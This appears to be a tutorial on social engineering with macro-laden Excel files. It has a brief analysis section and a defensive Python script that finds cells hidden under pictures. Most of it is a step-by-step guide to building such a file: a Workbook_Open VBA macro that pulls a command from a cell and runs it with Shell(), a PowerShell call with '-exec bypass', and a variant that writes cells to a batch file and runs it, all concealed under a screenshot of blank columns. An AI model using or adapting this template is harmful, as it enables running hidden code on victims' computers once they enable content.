Social Engineering using Hidden Macros in Excel

In what follows, we analyze a malicious document that contains a macro, which is slightly more difficult than analyzing an .exe, but not impossible.

NOTE: Simply running a tool like oledump or olevba will return the macros in the document.

All it will show is that the macro extracts code from a specific column and executes it using Shell(), which is suspicious, as shown below:

And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:

But if you hover your mouse over BG1 (or just look a little closer and notice the columns that are not aligned), you will see that there is an image overlapping the code:


Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.
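A defender-side check for the overlay described above, added here as an example (it is not code from the original post): it lists non-empty cells that sit under a picture anchor. It assumes an OOXML workbook (.xlsm) that has already been unzipped; the XML strings are constructed samples and the function names are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

XDR = "{http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing}"
SML = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Constructed sample parts, shaped like xl/drawings/drawing1.xml and
# xl/worksheets/sheet1.xml from an unzipped .xlsm (not taken from a real file).
DRAWING = """<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing">
 <xdr:twoCellAnchor>
  <xdr:from><xdr:col>57</xdr:col><xdr:row>0</xdr:row></xdr:from>
  <xdr:to><xdr:col>60</xdr:col><xdr:row>3</xdr:row></xdr:to>
  <xdr:pic/>
 </xdr:twoCellAnchor>
</xdr:wsDr>"""
SHEET = """<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData>
 <row r="1"><c r="A1"><v>42</v></c>
  <c r="BG1" t="inlineStr"><is><t>constructed-placeholder-text</t></is></c></row>
</sheetData></worksheet>"""

def cell_to_rc(ref):
    """'BG1' -> zero-based (row, col), the indexing drawing anchors use."""
    letters, digits = re.fullmatch(r"([A-Z]+)(\d+)", ref).groups()
    col = 0
    for ch in letters:
        col = col * 26 + ord(ch) - ord("A") + 1
    return int(digits) - 1, col - 1

def picture_boxes(drawing_xml):
    """Yield (row0, col0, row1, col1) for each picture with a two-cell anchor."""
    for anchor in ET.fromstring(drawing_xml).iter(XDR + "twoCellAnchor"):
        if anchor.find(XDR + "pic") is None:
            continue  # charts and shapes are out of scope for this check
        start, end = anchor.find(XDR + "from"), anchor.find(XDR + "to")
        yield tuple(int(p.find(XDR + k).text)
                    for p in (start, end) for k in ("row", "col"))

def covered_cells(sheet_xml, drawing_xml):
    """Return the references of non-empty cells lying under a picture."""
    boxes = list(picture_boxes(drawing_xml))
    hits = []
    for c in ET.fromstring(sheet_xml).iter(SML + "c"):
        if c.find(SML + "v") is None and c.find(SML + "is") is None:
            continue  # cell holds no value
        r, col = cell_to_rc(c.get("r"))
        if any(r0 <= r <= r1 and c0 <= col <= c1 for r0, c0, r1, c1 in boxes):
            hits.append(c.get("r"))
    return hits

if __name__ == "__main__": print(covered_cells(SHEET, DRAWING))
```

Any cell it reports is worth reading in the formula bar, since its content is hidden from view in the grid.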

Another way to reveal the code extracted from the Excel worksheet is by using MsgBox:

Creating the document

What's needed:

  1. Screenshot of a set of blank columns to overlay over the code
  2. Macro that extracts code from the workbook and executes it:

    Private Sub Workbook_Open()
        Data = Sheet1.Range("BG1")
        Shell (Data)
    End Sub

  • Data = Sheet1.Range("BG1") looks at cell BG1, extracts everything in it and places it in the variable Data
  3. Code that will be extracted and executed when the document is opened and the user clicks on "Enable Content":

    powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt

After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert > Illustrations > Images).

Then import the macro into ThisWorkbook and change the Range() section to match your column. If you entered the data in column A and it is in the 1st row, it would be Range("A1").

Writing multiple lines to a file

Writing multiple lines to a file is simple and only requires adding a few lines of code.

The macro code used is here:

    Private Sub Workbook_Open()
    1. Dim Path As String
    2. Dim FileNumber As Integer
    3. FileNumber = FreeFile
    4. Data = Sheet1.Range("BG1")
    5. Data2 = Sheet1.Range("BG2")
    6. Path = "test.bat"
    7. Open Path For Output As FileNumber
    8. Print #FileNumber, Data
    9. Print #FileNumber, Data2
    10. Close FileNumber
    11. Shell (Path)
    End Sub

  • Lines 1-3 are static, keep them as they are. They just define the variables used.
  • Lines 4-6 are dynamic. You will need to change the strings on lines 4 & 5 so that they point to where your code is in the Excel worksheet. Change line 6 to the file path you want.
  • Lines 7-9 are also dynamic; they open the file and write the extracted data to it. Lines 8 & 9 in particular are the lines responsible for writing the data to the file.

Just enter the code you want to write to a file, note the column and row in which it is located, and change the Data & Data2 variables to fit your column and row (add more variables if needed).


Then overlay the code with the blank line screenshot and you're done!


